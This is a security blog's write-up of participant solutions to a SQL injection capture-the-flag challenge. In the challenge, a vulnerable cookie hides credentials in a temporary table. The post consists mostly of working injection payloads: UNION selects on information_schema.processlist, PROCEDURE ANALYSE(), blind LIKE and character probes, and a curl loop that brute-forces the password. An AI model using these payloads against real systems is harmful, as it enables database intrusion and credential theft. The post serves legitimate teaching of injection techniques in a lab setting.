Solutions for challenge 2B

Solutions for challenge 2B

Posted on August 16, 2012 by Roberto Salgado

After posting the solutions for challenge 2A from the series of SQL Injection challenges, it only made sense to continue with 2B; considering that 'B' is a slighty more difficult variation of 'A'. Challenge 2B is probably my favorite challenge because of its simplicity, yet how confusing it was for many participants.



DISCLAIMER: If you haven't tried this challenge, it is still available here (no longer available online) in case you want to give it a shot before reading the SOLUTIONS below.

This challenge, similar to 2A, allows you to log in as guest and creates the cookie user_id which is vulnerable to SQL Injection. Initially no filtering was used since the idea behind the challenge was to figure out different ways of retrieving the table/column name. What is tricky about this challenge is that it uses a temporary table to store the credentials and the temp table only exists during the PHP script's execution. The thing about temporary tables is that they do not appear in information_schema.tables/columns, so this was the perfect way of making participants figure out other methods for obtaining the table/column names.

The intended solution is to use information_schema.proccesslist, which is available starting from MySQL 5.1. Injecting union select info from information_schema.processlist will return the whole query being used which can be extremely useful when table_name/column_name are being blocked by a WAF/IDS.


-1 union select info from information_schema.processlist

SELECT websec_rocks_temp_username, websec_rocks_temp_user_priv FROM websec_rocks_temp_uzuAr1Os WHERE websec_rocks_temp_user_id = -1 union select info from information_schema.processlist

Challenge Modifications

After w00d's and Miroslav's solutions, I made 2 slight adjustments to the challenge, so that it would be solved as intended. W00d's solution used PROCEDURE ANALYSE(), so I decided to block the word 'PROCEDURE', since this method is already documented on The SQL Injection KB; w00d later submitted a solution using the intended method. As for Miroslav, he was able to find the column name through a dictionary attack using the txt/common-columns.txt file from sqlmap. The second modification was to change the column names so they could no longer be guessed.




user_id= 3 union select 1,2,concat_ws(0x3a,command,time,state,info),4 from information_schema.processlist limit 1-- -





curl -i --cookie "user_id=0 limit 3,1 PROCEDURE ANALYSE()"

curl -i --cookie "user_id=-1 union select group_concat(info),2 from information_schema.processlist"

Miroslav Stampar:


user_id=0 AND ORD(MID(temp_password,17,1))>1 LIMIT 0,1


user_id=-1 union select info,'padding' from information_schema.processlist#


user_id=0+and+1=0+union+select+1,unhex(hex(concat_ws(0x3a,info,state)))+from information_schema.processlist limit 0,1

user_id=0 and websec_rocks_temp_password like 'a%'


Used processlist

user_id=0 and websec_rocks_temp_password like '%'


Used processlist

for i in {4,5,6,7} ; do for j in {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} ; do curl -b "user_id=-9 or websec_rocks_temp_password LIKE 0x454c5f4d55595f56455247${i}${j}25" 2>&1 | grep ADMIN ; echo $i$j ;done; done


user_id=-1 union select info,2 from information_schema.processlist limit 1;

user_id=0 and (@:=websec_rocks_temp_password) union select @,1;


user_id=5 UNION select 1,(select info from information_schema.processlist LIMIT 1)

Same script from challenge 2A.


Used processlist


Submitted a Python script found here.


user_id=-1 union select 1,info from information_schema.PROCESSLIST limit 0,1#

user_id=0 and LENGTH(websec_rocks_temp_password)=16#

user_id=0 and websec_rocks_temp_password like 0x25656c5f6d75795f76657267756974617325#


A full list of the victors for each challenge is available here.


Latest Blog Entries

Belkin Wemo Switch NMap Scripts
Belkin Wemo Switch Smart Plug is a network controlled power outlet. The current firmware version does not requiere authentication to switch the power ON or OFF or to gather information such as nearby wireless networks. Two NMap scripts have been published

Downloading an Application's Entire Source Code Through an Exposed GIT Directory
Website administrators sometimes inadvertently leave an exposed .git directory, from which it is possible to download the entire source code of the web application using just wget and a common server misconfiguration.

credmap: The Credential Mapper
An overview of credmap, an open source penetration testing tool that automates the process of testing for credential reuse. It does so by testing supplied user credentials on known websites and verifies if the password has been reused on any of these.

Latest News

Blackhat EU 2015
Websec participated with two tools at the Blackhat, EU Arsenal held in Amsterdam, NL from the 10-13 of November, 2015. During this event, we introduced our brand new tool "credmap: The Credential Mapper" and also presented an amped-up version of Panoptic.

BSides Vancouver 2015
Websec is proud to announce that we will be attending the 3rd annual edition of BSides Vancouver, a local non-profit information security conference held in the heart of Vancouver, BC on March 16 and 17.